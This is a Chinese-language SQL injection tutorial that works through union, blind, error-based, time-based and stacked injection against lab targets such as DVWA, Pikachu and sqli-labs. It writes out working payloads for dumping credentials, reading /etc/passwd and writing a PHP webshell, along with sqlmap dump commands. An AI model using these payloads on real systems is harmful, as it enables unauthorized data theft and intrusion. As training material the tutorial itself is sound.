# SQL注入漏洞 ## 1. Mysql回顾 ### 1.1 数据库结构基础 ![image-20250528141640770](01.SQL注入漏洞原理/image-20250528141640770.png) ![image-20230426165200366](01.SQL注入漏洞原理/202304261652391.png) 如图所示 数据库 为层级结构: ``` +数据库 ( database ) + - 表_user ( table_user ) + - 表_users ( table_users ) + + - 列_id (column_id) + + - 列_username (column_username) + + - 列_password (column_password) + + + - 数据 + + + - 数据 ``` ### 1.2 数据库语法基础 常用语法: - `SELECT` ```sql SELECT 列名1, 列名2, ... FROM 表名 WHERE 条件 ``` - `UNION` ```sql SELECT 列名 FROM 表名 UNION SELECT 列名_1 FROM 表名_1; ``` 注意 使用 `UNION` 的时候要注意两个表的列数量必须相同。 - `LIMIT` - SQL #返回表中前number行数据 ```sql SELECT column1, column2, ... FROM table_name LIMIT number; ## 从offset+1行开始返回row_count行数据 SELECT column1, column2, ... FROM table_name LIMIT offset, row_count; ## 比如 LIMIT 10, 10 返回11-20行数据 ``` - 注释 - `-- `,注意在两个减号后必须要有一个空格 - `#`,注释符号,注意在网站url中,#被认为是锚点 - `/* 被注释的部分 */` ,注释一个范围 - `/*!32302 被注释的部分 */`,只有大于对应版本的mysql,此处代码才会被执行 - 32302是 MySQL版本号(这里是5.0.3版本,因为MySQL用 `32302` 表示5.0.3),具体版本在遇到的时候查询即可。 ```sql SELECT username,password FROM users WHERE id = ((1)) union select username,password from user;-- )) limit1,1;后面的内容都将被注释 DROP sampletable;# 后面的内容都将被注释 DROP/*comment*/sampletable DR/**/OP/*绕过过滤*/sampletable SELECT/*替换空格*/password/**/FROM/**/Members ## /**/可用于替换空格 ## /*中间的内容都将被注释*/ SELECT /*!32302 1/0, */ 1 FROM tablename ## 这种 /*! 注释仅在MySQL中存在 SELECT * FROM users /*!32302 WHERE id = 1 */; ## MySQL ≥ 5.0.3:实际执行的是 SELECT * FROM users WHERE id = 1; ## MySQL < 5.0.3:执行的是 SELECT * FROM users;(WHERE条件被忽略) ``` - `Order by` ```sql SELECT column1, column2, ... FROM table_name [WHERE condition] ORDER BY column_name [ASC|DESC]; SELECT * FROM table_name ORDER BY column_name DESC LIMIT 10; ## DESC表示降序,ASC表示升序(默认行为,不写就是升序) ``` 其中,column1、column2 等表示要查询的列名,table_name 表示要查询的表名,condition 表示查询条件,column_name 表示要按照哪一列进行排序,ASC 或 DESC 表示升序或降序排列。可以使用多个列名来进行排序,多个列名之间用逗号分隔。 ```sql ## 在SQL注入中我们常用它来判断列数 SELECT column1, column2 FROM table_name [WHERE condition] ORDER BY 1;# 不报错 SELECT column1, column2 FROM table_name [WHERE condition] ORDER BY 2;# 不报错 SELECT column1, column2 FROM table_name [WHERE condition] ORDER BY 3;# 报错 ``` 常用参数: - `user()`:当前数据库用户 - `database()`:当前数据库名 - `version()`:当前使用的数据库版本 - `@@datadir`:数据库存储数据路径 - `concat()`:联合数据,用于联合两条数据结果。如 `concat(username,0x3a,password)` - `group_concat()`:和 `concat()` 类似,如 `group_concat(DISTINCT+user,0x3a,password)`,用于把多条数据一次注入出来 - `concat_ws()`:用法类似 - `hex()` 和 `unhex()`:用于 hex 编码解码 - `ASCII()`:返回字符的 ASCII 码值 - `CHAR()`:把整数转换为对应的字符 - `load_file()`:以文本方式读取文件,在 Windows 中,路径设置为 `\\` - `select xxoo into outfile '路径'`:权限较高时可直接写文件 ### 1.3 模式(SCHEMA) 在 mysql5 版本以后,mysql 默认在数据库中存放在一个叫 information_schema 里面这个库里面有很多表,这些表记录着Mysql数据库的相关信息,其中有几个表需要我们注意。 **SCHEMATA表中SCHEMA_NAME保存着所有数据库的名字** 可以使用如下的sql命令在information_schema数据库中查询所有数据库名 ![image.png](01.SQL注入漏洞原理/1672028884759-7cc819cb-5ab5-44be-8d3d-372a6426ec2f.webp) **TABLES表中保存着Mysql中所有的表名** 可以使用如下sql语句查询出指定数据库的所有表 ![image.png](01.SQL注入漏洞原理/1672029170038-a2996228-778a-4ba3-bfee-ababc6786f0c.webp) **COLUMNS表中保存了所有的列名** 可以使用如下的方式查询到指定表的列名 ![image.png](01.SQL注入漏洞原理/1672029266123-2af885ec-61f4-4dfb-b538-00c0c1a40bb4.webp) ## 2.SQL注入原理 SQL注入漏洞的产生需要满足以下两个条件 - 参数用户可控:从前端传给后端的参数内容是用户可以控制的 - 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询 ### 2.1 案例展示 比如下面的语句: ```php $sql = "SELECT username,password FROM users WHERE id = ".$_GET["id"]; ``` 对于他的预期操作,一般一个 id 是用来索引的 , 传入的值应该是: ```php $_GET["id"] = 1; $_GET["id"] = 2; ``` 所以预期执行的语句应该是: ```php $sql = "SELECT username,password FROM users WHERE id = 1"; $sql = "SELECT username,password FROM users WHERE id = 2"; ...... ``` 在没有过滤的情况下,我们能够在后面拼接我们自己的语句 比如,我们传入的值: ```php $_GET["id"] ="1 union select username,password from user" ``` 那么最后执行的语句就是: ```php $sql = "SELECT username,password FROM users WHERE id = 1 union select username,password from user;" ``` ![image-20230426163533547](01.SQL注入漏洞原理/202304261635588.png) 这样就造成了非预期语句的执行,我们在获得 `users` 表中的预期数据的同时也获得了 `users` 表中的非预期数据。 当你看到这时,不需要对语句有具体了解,但你需要知道 SQL 注入是一个怎么样的过程。 下面我们从数据库基础 —— 结构 基本语法开始 一步一步引到学会基础的 SQL 注入。 ### 2.2 注入流程 #### 2.2.1 信息收集 **目标**:了解目标系统的数据库类型、结构和可能的注入点 - **识别输入点**: - URL参数 - 表单字段 - HTTP头(Cookie, User-Agent等) - API端点 - **收集系统信息**: - 识别后端数据库类型(MySQL, MSSQL, Oracle等) - 确定Web服务器和编程语言 - 分析错误信息 #### 2.2.2 初步测试 **目标**:确认是否存在SQL注入漏洞 - 基础注入测试 ```sql ' OR 1=1 -- " OR 1=1 -- ' OR 'a'='a ``` - 逻辑测试 - 添加 `AND 1=1` 和 `AND 1=2` 观察响应差异 - 使用 `SLEEP()` 或 `WAITFOR DELAY` 测试时间盲注 - 注释测试 ```sql ' -- ' /* '; -- ``` #### 2.2.3 漏洞确认阶段 **目标**:确认漏洞类型和可利用性 - **确定注入类型**: - 基于错误的注入 - 布尔盲注 - 时间盲注 - 联合查询注入 - **测试数据库功能**: - 测试字符串连接功能 - 测试注释功能 - 测试堆叠查询能力 #### 2.2.4 数据提取阶段 **目标**:利用确认的漏洞提取数据库信息 - **提取基本信息**: ```sql ' UNION SELECT 1,@@version,3 -- ' UNION SELECT 1,user(),3 -- ' UNION SELECT 1,database(),3 -- ``` - **提取表结构**: ```sql ' UNION SELECT 1,table_name,3 FROM information_schema.tables -- ``` - **提取列信息**: ```sql ' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users' -- ``` #### 2.2.5 高级利用阶段 **目标**:获取更敏感数据或系统权限 - **读取文件**: ```sql ' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3 -- ``` - **写入文件**: ```sql '; SELECT '' INTO OUTFILE '/var/www/shell.php' -- ``` - **执行系统命令**(取决于数据库类型和权限) #### 2.2.6 报告阶段 **目标**:记录发现并建议修复方案 - **详细记录**: - 漏洞位置 - 利用方法 - 影响范围 - 复现步骤 - **修复建议**: - 使用参数化查询 - 实施输入验证 - 最小权限原则 - WAF规则 ## 3. 注入分类 ### 3.1 注入类型 SQL注入分类,按SQLMap中的分类来看,SQL注入类型有以下5种: - UNION query SQL injection(可联合查询注入) - Stacked queries SQL injection(可多语句查询注入,堆叠查询) - Boolean-based blind SQL injection(布尔型注入) - Time-based blind SQL injection(基于时间延迟注入) ### 3.2 请求类型 - GET注入 - POST注入 - 头部注入 ### 3.3 数据类型 SQL注入按照**输入参数的数据类型**分类 - 数字型注入(Integer-Based) - **特点**:参数为纯数字(如ID、年龄、页码),无需引号闭合。 ```sql id=1 OR 1=1 -- 永真条件 id=1 AND 1=0 -- 永假条件(测试响应差异) id=1; DROP TABLE users -- 堆叠查询(需数据库支持) ``` - 字符串型注入(String-Based) - **特点**:参数为字符串(如用户名、搜索词),需闭合引号。 - **关键点**:需处理单引号/双引号闭合,常见于登录框、搜索框。 ```sql username=' OR '1'='1' -- password=' UNION SELECT 1,2,3 -- search=' AND 1=CONVERT(int,@@version) -- ``` - 搜索型注入(Like/模糊查询注入) - **特点**:参数用于模糊查询(`LIKE`语句),可能包含通配符(`%`、`_`)。 ```sql search=%' AND 1=1 -- search=test%' UNION SELECT database(),2,3 -- ``` ## 4. union联合注入 ### 4.1 注入原理 创建表 ```sql create table admin( id int PRIMARY key auto_increment, username VARCHAR(255) not null, password VARCHAR(255) not null ) ENGINE=innodb default charset=utf8; insert into admin(username, password) value ('张三','123456'), ('李四','654321'); ``` 查询表 ![img](01.SQL注入漏洞原理/1672035071634-c5659462-3146-4894-be23-800f2a8a5194.png) 如果不知道用户名的情况下,就不会查询到任何结果 ![img](01.SQL注入漏洞原理/1672035105289-4ad09c21-01fd-473d-abeb-fed96cbfdbf4.png) 可以使用union查询在结果后面拼接一个内容 ![img](01.SQL注入漏洞原理/1672035179719-92140183-c7cd-486d-8068-cda72ebd52f8.png) 拼接上去的内容列数必须要与之前查询结果显示的列数相同,不然会报错 ![img](01.SQL注入漏洞原理/1672035223642-24db75a4-069c-424e-93fc-edc465429f89.png) 在拼接上去的内容里面可以插入一些查询函数,就可以获取一些信息 ![img](01.SQL注入漏洞原理/1672035280095-caf6d9b8-8499-4ac2-9283-f40fe709d492.png) ### 4.2 靶场案例 DVWA靶场案例 ![image-20250603154006472](01.SQL注入漏洞原理/image-20250603154006472.png) 分析代码 ![image.png](01.SQL注入漏洞原理/1704768122303-d02125ba-d5e6-499f-a01c-03a6ffd207bd.webp) 使用$_REQUEST 直接接收 id 参数,且没有进行过滤,且可以接收 cookie get post 这些传递方法。当传入 1 的时,页面正常返回用户信息。 如果传入 1' 语法会出现语句 You have an error in your SQL syntax;这种英文是mysql 语法错误提示 ![image.png](01.SQL注入漏洞原理/1672037398686-547525c4-9c2f-45c4-a44f-c6246de47582.webp) 根据代码分析'$id'是属于字符串类型 所以在进行 SQL 注入检测的时候要注意匹配字符串 #### 4.2.1 判断SQL注入 输入 1'and '1'='1页面返回用户信息 1'and '1'='2 页面返回不一样的信息。基本可以确定存在 SQL注入漏洞 ![image.png](01.SQL注入漏洞原理/1672037494852-055edea1-8ea8-4df8-a39c-8dc645fbd396.webp) #### 4.2.2 判断字段数 使用语句 order by 确定当前表的字符数 order by 1 如果页面返回正常 字段数不少于 1,order by 2 不少于 2,一直如此类推直到页面出错。正确的字段数是出错数字减少 1 ![image.png](01.SQL注入漏洞原理/1672037611771-317d00cf-63cf-462a-893d-f44e4cc5b110.webp) #### 4.2.3 获取敏感信息 获取可以得到回显的位置,在此案例中两个字段都可以回显 ![image.png](01.SQL注入漏洞原理/1672037999154-dcb98a13-0f16-4b04-842a-db898e2612fc.webp) 获取当前数据库名称,group_concat()可以将多组数据进行合并,0x3A是冒号的HEX编码 ![image.png](01.SQL注入漏洞原理/1672038244124-7f5934f1-ab2d-42b5-ac38-0e1f557f3bf2.webp) 知道当前数据库是d14_s_iproute_cn #### 4.2.4 获取表名 ```sql 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='d14_s_iproute_cn' -- ``` ![image.png](01.SQL注入漏洞原理/1672038427387-1bc779c7-3ae8-442b-b56b-acf39010a42b.webp) 知道当前数据表名是guestbook,users #### 4.2.5 获取字段名 ```sql 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- ``` ![image.png](01.SQL注入漏洞原理/1672038524452-d71b69af-2e02-4180-8f10-c28527f8137c.webp) 敏感字段为user,password #### 4.2.6 获取字段内容 ```sql -1' union select 1,group_concat(user,0x3A,password) from users limit 0,1 -- ``` ![image.png](01.SQL注入漏洞原理/1672038636049-081cdac0-1095-4ef6-ab8b-c7df716ecf99.webp) ## 5. Boolean布尔型盲注 在SQL注入攻击中,**盲注(Blind SQL Injection)** 是一种特殊类型,其核心特点是**攻击者无法直接获取数据库的错误信息或查询结果**,只能通过应用程序的间接响应(如页面状态变化、响应时间差异)来推断数据。以下是其核心要点: 1. **无直接回显** 与常规注入不同,盲注场景下: - 数据库执行结果不会直接显示在页面上; - 无论输入正确或错误值,页面可能返回相同内容(如仅显示“查询成功/失败”) 2. **依赖间接反馈** 攻击者需通过以下方式判断注入结果: - **页面状态变化**:如内容长度、HTTP状态码、特定关键词出现与否; - **响应时间差异**:通过延时函数人为制造时间延迟,观察页面加载时长 ### 5.1 判断布尔型盲注 ![image-20250603154500746](01.SQL注入漏洞原理/image-20250603154500746.png) 代码分析 ![image.png](01.SQL注入漏洞原理/1672108388982-32ca29c4-30e6-42ef-8a7e-be24011cbc1d.webp) 输入SQL注入检测语句,判断页面是否不一样,如果不一样大概会存在SQL注入漏洞。 ![image.png](01.SQL注入漏洞原理/1672108609433-031c869e-579d-4341-902f-ef0c856a815c.webp) ![image.png](01.SQL注入漏洞原理/1672108625657-6d50f5d8-3754-4096-abf6-b3959f0fcf9b.webp) 也可以使用sleep()函数查看是否会存在时间盲注 ![image.png](01.SQL注入漏洞原理/1672108737861-7709c1a1-f7b4-435b-b876-3676b5d286bd.webp) ### 5.2 获取数据库信息 ``` substring(<字符串>,<开始截取>,<截取长度>) ``` 通过将查询到的结果的字母进行比对,可以通过布尔型盲注获取数据的内容,以下代码可以确认数据库名第一个字母是d,如果不是d将会显示另外一个不匹配的页面 ``` 1' and substring(database(),1,1)='d' -- ``` ![image.png](01.SQL注入漏洞原理/1672109007373-a2ed0213-dbb2-4a24-81bc-b6ca5b7cf618.webp) 接下来可以查询第二个字母,并且以此类推,可以将需要查询的字符转换为ascii字符编码,然后进行大于小于比对加快查询速度,通过对照ascii码表可以很快锁定字符是什么 ``` 1' and ascii(substring(database(),1,1))>97 -- ``` ![image.png](01.SQL注入漏洞原理/1672109318593-eb9c0eaa-f69f-4c16-8a15-cec4a6ccc58a.webp) ### 5.3 使用burpsuite工具 使用burpsuite抓取提交的数据包,通过如下代码获取表名 ``` 1' and substring((select table_name from information_schema.tables where table_schema=database() limit 1),1,1)='d' -- ``` 选择cluster bomb模式,并且在如下两个位置处插入变量,方便后续通过字典进行穷举 ![image.png](01.SQL注入漏洞原理/1672111826997-86454a0f-06e7-4aa1-bbe1-786813afa4ad.webp) 第一个变量是字符的长度,可以适当设置长一些 ![image.png](01.SQL注入漏洞原理/1672111214415-d7615309-4436-48a7-8afe-3a40ebd9f226.webp) 第二个变量选择从字符中遍历 ![image.png](01.SQL注入漏洞原理/1672111255208-1c4b9635-2210-445b-a53f-d50449ab5424.webp) 开启进行测试 ![image.png](01.SQL注入漏洞原理/1672111354358-87a2a017-8910-4ff5-b9c3-d055b47bcf5f.webp) 将得到的结果进行整理,可以获取到想要的数据 ![image.png](01.SQL注入漏洞原理/1672111982351-cf0062cf-912c-4b9d-a5b0-2b6fc52d3b49.webp) 由于服务器并不区分大小写,所以将字典中大写删除,再次尝试,得到有一个表名为guestbook ![image.png](01.SQL注入漏洞原理/1672112106624-ba0877f7-2a6d-4820-a645-1eb87d6a1487.webp) 通过此方式可以将数据库中的敏感信息全部查询出来,第二个数据表名为users ![image.png](01.SQL注入漏洞原理/1672112581783-d3a8b4fe-1c0e-4332-ae0d-d3eb0492e5f8.webp) 通过这样的方式,可以将数据库中的信息全部获取 ## 6. 报错注入 数据库显错是指,数据库在执行时,遇到语法不对,会显示报错信息,例如语法错误语句select' ``` You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1 ``` 程序开发期间需要告诉使用者某些报错信息 方便管理员进行调试,定位文件错误。特别 php 在执行 SQL 语句时一般都会采用异常处理函数,捕获错误信息。在 php 中 使用 mysql_error()函数。如果 SQL 注入存在时,会有报错信息返回,可以采用报错注入。 ![image.png](01.SQL注入漏洞原理/1675146586351-b6b5ae36-4943-4342-b1f6-7e14bb0316e5.webp) 如果语法错误,在PHP中,可以使用mysqli_error()、mysqli_connect_error()语句将语法错误信息显示到页面上。 ![image.png](01.SQL注入漏洞原理/1675150704061-310212b5-3059-49a0-95d6-4a38ee693aff.webp) ### 6.1 updatexml报错注入 已知在sql语句中有种函数是updatexml(xml_target, xpath_expr, new_xml),这个函数原本的作用是用来更新选定XML片段的内容,但是原本的作用已经不重要了,我们发现只要xpath_expr不是一个目录路径,这个代码就会报错 ![image.png](01.SQL注入漏洞原理/1675151239027-f2538c89-2866-4040-ab80-7dc3769d6b26.webp) 通过上面的测试,我们发现这个报错信息中包含了我们写入的查询语句,也就是如果发现网站存在sql报错的地方,就可以执行任意的查询语句 ```sql select updatexml('1',concat('~',(你要查询的语句)),'1'); ``` 在配合上我们前面学来的从information_schema中的一系列查询,就可以把敏感信息从数据库中查询出来 ### 6.2 靶场实战 构造工具语句,获取数据库名信息 ``` 1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&Submit=Submit# ``` ![QQ_1749001455879](01.SQL注入漏洞原理/QQ_1749001455879.png) 但是采用updatexml报错函数只能显示32位长度的内容,如果获取的内容超过32字符就要采用字符串截取方法。 updatexml()最多显示32位长度的错误字符,如果显示内容过长我们可以使用substr()来截取。 ```sql ## substr(password,10)表示从第10位开始截取后面的内容 ' and updatexml('1',concat('~',( select substr(password,10) from admin limit 0,1 )),'1')# ``` 使用下面语句查询表名 ```sql 1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= database()),0x7e),1) --+&Submit=Submit# ``` ![image-20250604094507753](01.SQL注入漏洞原理/image-20250604094507753.png) 使用下面语句查询字段名 ```sql 1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) --+&Submit=Submit# ``` 得到的结果如下,显示并不完整 ![image.png](01.SQL注入漏洞原理/1675154980581-d0bef242-d887-4afa-a618-9cfab4757cdc.webp) 截取字符串,查看完整内容 ```sql 1'and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),50) from information_schema.columns where table_name='users'),0x7e),1) --+&Submit=Submit# ``` 一直查询到结束,获得完整字符串为 ``` ~user_id,first_name,last_name,user,password,avatar,last_login,failed_login~ ``` 也可以使用limit来将字段名一个个获取 ```sql 1' and updatexml(1,concat(0x7e,( select column_name from information_schema.columns where table_name='users' limit 0,1 ),0x7e),1) --+&Submit=Submit# ``` 查看到第一个字段名 ![image.png](01.SQL注入漏洞原理/1675299038482-ca046fea-c46b-431b-b186-eecc0dbd2141.webp) 查看第二个字段名 ```sql 1' and updatexml(1,concat(0x7e,( select column_name from information_schema.columns where table_name='users' limit 1,1 ),0x7e),1) --+&Submit=Submit# ``` ![image.png](01.SQL注入漏洞原理/1675299072990-2e141fa9-08ae-43b8-874f-fa1e3fa15d97.webp) 可以使用 burpsuite 批量对字段批量获取,首先抓包,修改变量,设置匹配规则。 ![image.png](01.SQL注入漏洞原理/1675301317798-e3c7b02a-3925-4c69-a38c-3e431afe15c5.webp) ![image.png](01.SQL注入漏洞原理/1675301470255-5dbc665c-e4fd-463f-94e4-276706513ed2.webp) ![image.png](01.SQL注入漏洞原理/1721181986475-29c8c055-6957-483b-8a41-3eac5d9e622d.webp) ![image.png](01.SQL注入漏洞原理/1675301528369-4300b018-bfbe-49d7-8d78-bb04e09a304e.webp) 开始攻击,并且最终得到所有的字段名 ![image.png](01.SQL注入漏洞原理/1675301553450-8d1a815d-3665-4a9d-bc6e-fc716367553f.webp) 通过这样的方式可以获取所有的用户名和密码 ```sql 1' and updatexml(1,concat(0x7e,(select concat(0x23,user,0x3a,password,0x23) from users limit 0,1),0x7e),1) --+&Submit=Submit# ``` 由于updatexml只能显示32位报错信息,所以此处显示不完整,下面的floor报错将没有限制字符限制。 ### 6.3 floor报错注入 利用 `GROUP BY` 与 `COUNT(*)`、`FLOOR(RAND(0)*2)` 组合时,因**临时表主键冲突**触发报错,通过报错信息泄露数据。 #### 6.3.1 关键函数说明 | 函数 | 作用 | | :--------: | :---------------------------: | | `FLOOR()` | 向下取整(如 `FLOOR(1.7)=1`) | | `RAND(0)` | 生成固定伪随机序列 | | `CONCAT()` | 用分隔符拼接字符串 | | `GROUP BY` | 分组统计(触发虚拟表创建) | #### 6.3.2 核心机制 - 伪随机序列固定性 RAND(0) 在固定种子下生成序列 0, 1, 1, 0, 1, 1...,FLOOR() 取整后得 0 或 1 ```sql ## 查询users中的数据,但是select显示的结果是处理后的随机0和1 MariaDB [dvwa]> select floor(rand(0)*2) from users; +------------------+ | floor(rand(0)*2) | +------------------+ | 0 | | 1 | | 1 | | 0 | | 1 | +------------------+ 5 rows in set (0.00 sec) ## 在显示的0和1前面拼接想要查询的语句 MariaDB [dvwa]> select concat((select database()),floor(rand(0)*2)) from users; +----------------------------------------------+ | concat((select database()),floor(rand(0)*2)) | +----------------------------------------------+ | dvwa0 | | dvwa1 | | dvwa1 | | dvwa0 | | dvwa1 | +----------------------------------------------+ 5 rows in set (0.00 sec) ``` - 虚拟表主键冲突 GROUP BY 分组时会创建虚拟表存储键值(key)和计数(count(*))。流程如下: - 首次计算 FLOOR(RAND(0)*2) 作为查询键; - 若键不存在,插入前重新计算该值作为实际插入键; - 因计算次数 > 插入次数,导致插入值与查询值不一致,最终触发主键重复错误 ```sql ## 计算此表中一共有几个数据 MariaDB [dvwa]> select count(*) from users; +----------+ | count(*) | +----------+ | 5 | +----------+ 1 row in set (0.00 sec) ## 计算此表中user列每个元素出现的次数 ## 注意查询结果是个虚拟表,这个虚拟表中user列是索引,不允许出现重复,不然会报错 MariaDB [dvwa]> select count(*) as user_count, user from users group by user; +------------+---------+ | user_count | user | +------------+---------+ | 1 | 1337 | | 1 | admin | | 1 | gordonb | | 1 | pablo | | 1 | smithy | +------------+---------+ 5 rows in set (0.01 sec) ``` - 报错泄露数据 冲突报错信息 Duplicate entry 'X' for key 'group_key' 中的 X 包含拼接的注入数据(如数据库名) ```sql ## 让group by后面的x列,通过计算,出现重复,这样就报错了 MariaDB [dvwa]> select count(*),(concat((select database()),floor(rand(0)*2)))x from users group by x; ERROR 1062 (23000): Duplicate entry 'dvwa1' for key 'group_key' ``` - dvwa靶场 ![image-20250604102518082](01.SQL注入漏洞原理/image-20250604102518082.png) - 使用burpsuite获取所有的用户名和密码 ```sql 1' or (select 1 from(select count(*),concat(floor(rand(0)*2),0x7e,( select concat(0x23,user,0x3a,password,0x23) from users limit 0,1 ),0x7e)x from information_schema.tables group by x)a)--+&Submit=Submit# ``` ![image.png](01.SQL注入漏洞原理/1675302145634-f9a62c96-0f96-4564-bf17-2a0759cd1d4b.webp) ### 6.4 十大报错函数 - floor() ```sql select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); ``` ![img](01.SQL注入漏洞原理/1675152463415-bb9d5c72-f223-43d7-ad11-566f2806f448.png) - extractvalue() ```sql select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); ``` ![img](01.SQL注入漏洞原理/1675152463501-b57bc1ed-d9c9-43e0-b31a-ec2920681985.png) - updatexml() ```sql select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); ``` ![img](01.SQL注入漏洞原理/1675152463376-5ea65fa6-e843-477d-88d4-44e2f12d336b.png) - geometrycollection() ```sql select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152463436-b47ac435-04b8-4d28-b18f-f6a8c7331e76.png) - multipoint() ```sql select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152463413-8722dfdb-10f9-439a-8265-2bab895dab90.png) - polygon() ```sql select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152464334-0227a179-7f5d-42ab-8b4c-f46037464d39.png) - multipolygon() ```sql select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152464353-55cc79bb-ecb2-4479-b578-8762a4085cc5.png) - linestring() ```sql select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152464531-052b93e2-759e-4caa-93f0-68925ca1a3ed.png) - multilinestring() ```sql select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); ``` ![img](01.SQL注入漏洞原理/1675152464606-9b365a73-53cf-4724-8ce3-ca379f0043fe.png) - exp() ```sql select * from test where id=1 and exp(~(select * from(select user())a)); ``` ![img](01.SQL注入漏洞原理/1675152464840-d9c7e953-1c88-429e-b9a3-229cce003382.png) ## 7. 时间注入 时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。 在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用'and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒根据这个原理来判断存在 SQL 时间注入。 代码示例 ```sql select if(2>1,sleep(10),0) select if(length(database())>1,sleep(5),0) 1' or if(length(database())>1,sleep(5),0)-- ``` 查看网页响应时间,可以确认判断内容是否正确,下面两张图显示的是正确和错误时间上的差异 ![image.png](01.SQL注入漏洞原理/1675302778066-aef2b7e2-5e97-4ebc-9a87-ccb0bb286a8d.webp) ![image.png](01.SQL注入漏洞原理/1675302807054-b42760d9-877a-433e-95d3-2758b3c9bbf0.webp) ### 7.1 源码分析 此处选用的靶场是Pikachu ![image-20250604103753470](01.SQL注入漏洞原理/image-20250604103753470.png) 打开源码 ![image-20250604104056024](01.SQL注入漏洞原理/image-20250604104056024.png) ### 7.2 sqlmap实战 使用sqlmap对注入检测(pikachu) ```sql sqlmap -u "http://192.168.173.130:32771/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T -u 表示检测的url -p 指定的检测参数 -v 显示调试模式 --technique=T 检测方法为时间注入 ``` ![image.png](01.SQL注入漏洞原理/1675303680797-333d505a-b46c-4959-918c-8410e61f20e3.webp) sqlmap 检测为时间注入,接下来通过这个注入获取数据库敏感信息。 ```sql sqlmap -u "http://192.168.173.130:32771/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --current-user --current-db --batch --current-user 获取用户 --current-db 获取数据库名 --batch 使用默认模式 就是自动帮你敲回车 ``` ![image.png](01.SQL注入漏洞原理/1675304060909-2b71b6eb-2e2e-43dc-a2d2-ff5629d7f541.webp) ```sql sqlmap -u "http://192.168.173.130:32771/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --batch --tables -D pikachu -D 指定数据库 --tables 获取表 ``` ![image.png](01.SQL注入漏洞原理/1675304593099-c7456dc9-048a-4142-8d16-193d9c03da41.webp) ```sql sqlmap -u "http://192.168.173.130:32771/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --batch -D pikachu -T users --columns -T 指定表 --columns 获取字段名 ``` ![image.png](01.SQL注入漏洞原理/1675305151319-18f25e40-43ad-4321-98b2-6e91fa92dfad.webp) ```sql sqlmap -u "http://192.168.173.130:32771/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --batch -D pikachu -T users -C "id,username,password" --dump -C 指定查询的字段 --dump 导出数据 ``` ![image.png](01.SQL注入漏洞原理/1675305736911-62e7a021-74bc-4036-a039-49764a31613a.webp) ## 8. 堆叠注入 一次性执行多个 SQL 语句的时候,比如说初始化数据库,导入备份。 堆叠查询:堆叠查询可以执行多条 SQL 语句,语句之间以分号(;)隔开,而堆叠查询注入攻击就是利用此特点,在第二条语句中构造要执行攻击的语句。 堆叠注入的危害是很大的 可以任意使用增删改查的语句,例如删除数据库 修改数据库,添加数据库用户。 在 php 里 mysqli_multi_query 和 mysql_multi_query这两个函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。 ```sql MariaDB [(none)]> select version();select database(); +--------------------------+ | version() | +--------------------------+ | 10.1.26-MariaDB-0+deb9u1 | +--------------------------+ 1 row in set (0.00 sec) +------------+ | database() | +------------+ | NULL | +------------+ 1 row in set (0.00 sec) ``` ### 8.1 源码分析 此处使用的靶场是sqli-labs,第38关 ![image-20250604105328256](01.SQL注入漏洞原理/image-20250604105328256.png) 查看源代码 ![image-20250604105527912](01.SQL注入漏洞原理/image-20250604105527912.png) ### 8.2 漏洞利用 可以先使用`1' and 1=2--+`和`1' and 1=1--+`确定是否存注入,然后使用堆叠注入进行检测。 ```sql 1' order by 3--+ -1' union select 1,2,3 --+ -1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1)--+ ``` ![image-20250604105619746](01.SQL注入漏洞原理/image-20250604105619746.png) 获取字段名 ```sql -1' union select 1,2,( select group_concat(column_name) from information_schema.columns where table_name='users' limit 1 )--+ ``` ![image-20250604105646604](01.SQL注入漏洞原理/image-20250604105646604.png) 在知道表和列的情况下,手动添加用户,如果有管理员表,还可以直接添加管理员 ```sql -1';insert into users(id,username,password)values(1000,'user666','123456')--+ ``` 下面访问id为1000的用户 ![image-20250604105805345](01.SQL注入漏洞原理/image-20250604105805345.png) ## 9. 二次注入 二次注入漏洞是一种在 Web 应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。 二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,但是 addslashes 有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。 